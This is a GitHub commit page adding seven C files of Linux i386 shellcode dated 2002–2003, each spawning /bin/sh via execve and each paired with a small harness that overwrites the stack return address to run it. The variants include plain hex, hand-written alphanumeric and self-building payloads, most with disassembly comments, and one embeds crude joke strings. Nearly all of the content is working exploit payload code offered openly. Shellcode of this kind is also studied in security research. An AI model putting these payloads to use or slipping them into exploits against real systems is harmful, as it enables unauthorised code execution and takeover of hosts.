Browse files

First commit

  • Loading branch information...
0 parents commit b8e66c3d4a596f45992c339ed7580865a4bcf430 @buffer committed May 14, 2011
Showing with 706 additions and 0 deletions.
  1. +42 −0 buffer-i386-alpha.c
  2. +58 −0 buffer-i386-cool.c
  3. +53 −0 buffer-i386-crazy.c
  4. +257 −0 buffer-i386-delirium.c
  5. +182 −0 buffer-i386-raptus.c
  6. +58 −0 buffer-i386-reallycool.c
  7. +56 −0 buffer-i386-short.c
42 buffer-i386-alpha.c
@@ -0,0 +1,42 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+char shellcode[] = "LLLLZhmeqrX5meqrHTVPPWRPPaQVRSPGWDOfhAMfXf5ECfPDVUajcX0Dob0T"
+ "odjdY0LohfhmNfXf1Dol0topjYY0Loq0toq0totjJX0Dou0tou0TovjFX0Do"
+ "w0towjhXfRhnKshhBabivERSvT29";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+
58 buffer-i386-cool.c
@@ -0,0 +1,58 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTR@CT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ * 80483c3: 31 d2 xor %edx,%edx
+ * 80483c5: 52 push %edx
+ * 80483c6: 68 6e 2f 73 68 push $0x68732f6e
+ * 80483cb: 68 2f 2f 62 69 push $0x69622f2f
+ * 80483d0: 89 e3 mov %esp,%ebx
+ * 80483d2: 52 push %edx
+ * 80483d3: 53 push %ebx
+ * 80483d4: 89 e1 mov %esp,%ecx
+ * 80483d6: 6a 0b push $0xb
+ * 80483d8: 51 push %ecx
+ * 80483d9: 52 push %edx
+ * 80483da: 53 push %ebx
+ * 80483db: 83 ec 10 sub $0x10,%esp
+ * 80483de: 61 popa
+ * 80483df: cd 80 int $0x80
+ *
+ */
+
+char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
+ "\x52\x53\x89\xe1\x6a\x0b\x51\x52\x53\x83\xec\x10\x61\xcd\x80";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+
53 buffer-i386-crazy.c
@@ -0,0 +1,53 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68"
+ "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1"
+ "THREE.RULES.TO.CODE.COOL.SHELLCODES"
+ "\x44\x44\x83\xc4\x20\x40\x40\x80\xeb\x03\x66"
+ "\x83\xc7\x05\x66\x83\xed\x06\x51"
+ "IF.LIFE.IS.SHORT.YOUR.SHELLCODE.SHOULD.BE.SHORTER"
+ "\x44\x44\x83\xc4\x30\x59\x04\x04\x4b\x4a\x4e"
+ "\x4e\x66\x83\xc7\x05\x66\x83\xed\x05\x51"
+ "NEVER.THINK.ABOUT.YOUR.MOMMY.WHILE.CODING"
+ "\x83\xc4\x18\x59\x40\x40\x4a\x66\x83\xc6\x03"
+ "\x66\x83\xc7\x03\x55"
+ "DONT.TOUCH.REGISTERS.TITS.ARE.BETTER"
+ "\x4c\x83\xc4\x3c\x40\x4b\x41\x4a\x46\x47\x66"
+ "\x83\xed\x05\xcd\x80";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+
257 buffer-i386-delirium.c
@@ -0,0 +1,257 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2003 Angelo Dell'Aera <buffer@antifork.org>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+
+/*
+ * This is an alphanumeric code completely written by hand which builds a
+ * shellcode and then executes it. It can be considered as the evolution
+ * of buffer-i386-raptus.c. Infact, in that shellcode, just the last asm
+ * instruction (int $0x80) is built at run-time. Here anything is built
+ * at run-time! Just a nice delirium, isn't it?! 8)
+ * This code was developed using Fenris by Michael Zalewski which helped
+ * me too much during development. As you can see from comments below,
+ * this shellcode works fine if __GNUC__ < 3. This is due to optimizations
+ * introduced by gcc with __GNUC__ 3. At this moment it's not available
+ * a version for such compilers but probably it will happen in the next
+ * future. Have fun!
+ */
+
+#include <ansidecl.h>
+
+main()
+{
+
+
+#if GCC_VERSION < 3000
+
+
+long *ret;
+char shellcode[] = "h3Zo0" // 68 33 5a 6f 30 push $0x306f5a33
+ "X" // 58 pop %eax
+ "5YQ7O" // 35 59 51 37 4f xor $0x4f375159,%eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "Y" // 59 pop %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "Q" // 51 push %ecx
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "Y" // 59 pop %ecx
+ "hfXZn" // 68 66 58 5a 6e push $0x6e565866
+ "X" // 58 pop %eax
+ "5404A" // 35 34 30 34 41 xor $0x41343034,%eax
+ "P" // 50 push %eax
+ "Z" // 5a pop %edx
+ "hGXXn" // 68 47 58 58 6e push $0x6e585847
+ "X" // 58 pop %eax
+ "5400A" // 35 34 30 30 41 xor $0x41303034,%eax
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "P" // 50 push %eax
+ "R" // 52 push %edx
+ "Q" // 51 push %ecx
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "hn000" // 68 6e 30 30 30 push $0x3030306e
+ "X" // 58 pop %eax
+ "5ARYO" // 35 41 52 59 4f xor $0x4f595241,%eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "Y" // 59 pop %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "A" // 41 inc %ecx
+ "Q" // 51 push %ecx
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "h0000" // 68 30 30 30 30 push $0x30303030
+ "X" // 58 pop %eax
+ "50000" // 35 30 30 30 30 xor $0x30303030,%eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "H" // 48 dec %eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "P" // 50 push %eax
+ "Z" // 5a pop %edx
+ "hffff" // 68 66 66 66 66 push $66666666
+ "X" // 58 pop %eax
+ "54545" // 35 34 35 34 35 xor $0x35343534,%eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "Q" // 51 push %ecx
+ "J" // 4a dec %edx
+ "J" // 4a dec %edx
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "R" // 52 push %edx
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "h0000" // 68 30 30 30 30 push $0x30303030
+ "X" // 58 pop %eax
+ "50000" // 35 30 30 30 30 xor $0x30303030,%eax
+ "H" // 48 dec %eax
+ "5DODO" // 35 4f 44 4f 44 xor $0x444f444f,%eax
+ "5v0v0" // 35 30 76 30 76 xor $0x76307630,%eax
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "H" // 48 dec %eax
+ ;
+
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+#else
+# error "This shellcode doesn't work if compiled with gcc-3.x. "
+# error "Compile it with gcc with __GNUC__ < 3! Aborting compiling...."
+#endif
+
+}
+
182 buffer-i386-raptus.c
@@ -0,0 +1,182 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2003 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ */
+
+
+/*
+ * This is an alphanumeric shellcode completely written by hand. It was
+ * developed using Fenris by Michael Zalewski which helped me too much
+ * during development. As you can see from comments below, this shellcode
+ * works fine if __GNUC__ < 3. This is due to optimizations introduced by
+ * gcc with __GNUC__ 3. At this moment it's not available a version for
+ * such compilers but probably it will happen in the next future.
+ *
+ * Thanks :
+ * ALoR - he suggested to me the idea of 'pushing the unobtainable' 8)
+ *
+ */
+
+
+#include <ansidecl.h>
+
+main()
+{
+
+#if GCC_VERSION < 3000
+
+long *ret;
+char shellcode[] = "h0000" // 68 30 30 30 30 push $0x30303030
+ "X" // 58 pop %eax
+ "50000" // 35 30 30 30 30 xor $0x30303030,%eax
+ "H" // 48 dec %eax
+ "5DODO" // 35 4f 44 4f 44 xor $0x444f444f,%eax
+ "5v0v0" // 35 30 76 30 76 xor $0x76307630,%eax
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "L" // 4c dec %esp
+ "P" // 50 push %eax
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "D" // 44 inc %esp
+ "hZZZZ" // 68 5a 5a 5a 5a push $0x5a5a5a5a
+ "X" // 58 pop %eax
+ "5ZZZZ" // 35 5a 5a 5a 5a xor $0x5a5a5a5a,%eax
+ "P" // 50 push %eax
+ "hn0sh" // 68 6e 30 73 68 push $0x6873306e
+ "D" // 44 inc %esp
+ "Y" // 59 pop %ecx
+ "I" // 49 dec %ecx
+ "Q" // 51 push %ecx
+ "L" // 4c dec %esp
+ "h00bi" // 68 30 30 62 69 push $0x69623030
+ "Y" // 59 pop %ecx
+ "I" // 49 dec %ecx
+ "Q" // 51 push %ecx
+ "D" // 44 inc %esp
+ "Y" // 59 pop %ecx
+ "I" // 49 dec %ecx
+ "Q" // 51 push %ecx
+ "L" // 4c dec %esp
+ "T" // 54 push %esp
+ "Z" // 5a pop %edx
+ "P" // 50 push %eax
+ "R" // 52 push %edx
+ "T" // 54 push %esp
+ "Y" // 59 pop %ecx
+ "hXPPP" // 68 58 50 50 50 push $0x50505058
+ "X" // 58 pop %eax
+ "5SPPP" // 35 53 50 50 50 xor $0x50505053,%eax
+ "P" // 50 push %eax
+ "h0000" // 68 30 30 30 30 push $0x30303030
+ "X" // 58 pop %eax
+ "50000" // 35 30 30 30 30 xor $0x30303030,%eax
+ "Q" // 51 push %ecx
+ "P" // 50 push %eax
+ "R" // 52 push %edx
+ "U" // 55 push %ebp
+ "T" // 54 push %esp
+ "V" // 56 push %esi
+ "W" // 57 push %edi
+ "a"; // 61 popa
+
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+#else
+# error "This shellcode doesn't work if compiled with gcc-3.x. "
+# error "Compile it with gcc with __GNUC__ < 3! Aborting compiling...."
+#endif
+
+}
+
58 buffer-i386-reallycool.c
@@ -0,0 +1,58 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ * 80483c3: 6a 0b push $0xb
+ * 80483c5: 58 pop %eax
+ * 80483c6: 99 cltd
+ * 80483c7: 52 push %edx
+ * 80483c8: 68 6e 2f 73 68 push $0x68732f6e
+ * 80483cd: 68 2f 2f 62 69 push $0x69622f2f
+ * 80483d2: 89 e3 mov %esp,%ebx
+ * 80483d4: 50 push %eax
+ * 80483d5: 8d 4c 24 f4 lea 0xfffffff4(%esp,1),%ecx
+ * 80483d9: 51 push %ecx
+ * 80483da: 52 push %edx
+ * 80483db: 53 push %ebx
+ * 80483dc: 83 ec 10 sub $0x10,%esp
+ * 80483df: 61 popa
+ * 80483e0: cd 80 int $0x80
+ *
+ */
+
+char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
+ "\x50\x8d\x4c\x24\xf4\x51\x52\x53\x83\xec\x10\x61\xcd\x80";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+
56 buffer-i386-short.c
@@ -0,0 +1,56 @@
+/*
+ * execve ("/bin/sh"..) (linux little endian)
+ *
+ * Copyright (c) 2002 Angelo Dell'Aera <buffer@users.sourceforge.net>
+ * Alberto Ornaghi <alor@blackhats.it>
+ *
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ * notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ * notice, this list of conditions and the following disclaimer in the
+ * documentation and/or other materials provided with the distribution.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ *
+ * 80483c3: 6a 0b push $0xb
+ * 80483c5: 58 pop %eax
+ * 80483c6: 99 cltd
+ * 80483c7: 52 push %edx
+ * 80483c8: 68 6e 2f 73 68 push $0x68732f6e
+ * 80483cd: 68 2f 2f 62 69 push $0x69622f2f
+ * 80483d2: 89 e3 mov %esp,%ebx
+ * 80483d4: 52 push %edx
+ * 80483d5: 53 push %ebx
+ * 80483d6: 89 e1 mov %esp,%ecx
+ * 80483d8: cd 80 int $0x80
+ *
+ */
+
+char shellcode[] = "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68"
+ "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
+ "\xe1\xcd\x80";
+
+main() {
+ long *ret;
+
+ ret = (long *)&ret + 2;
+ (*ret) = (long)shellcode;
+
+}
+

0 comments on commit b8e66c3

Please sign in to comment.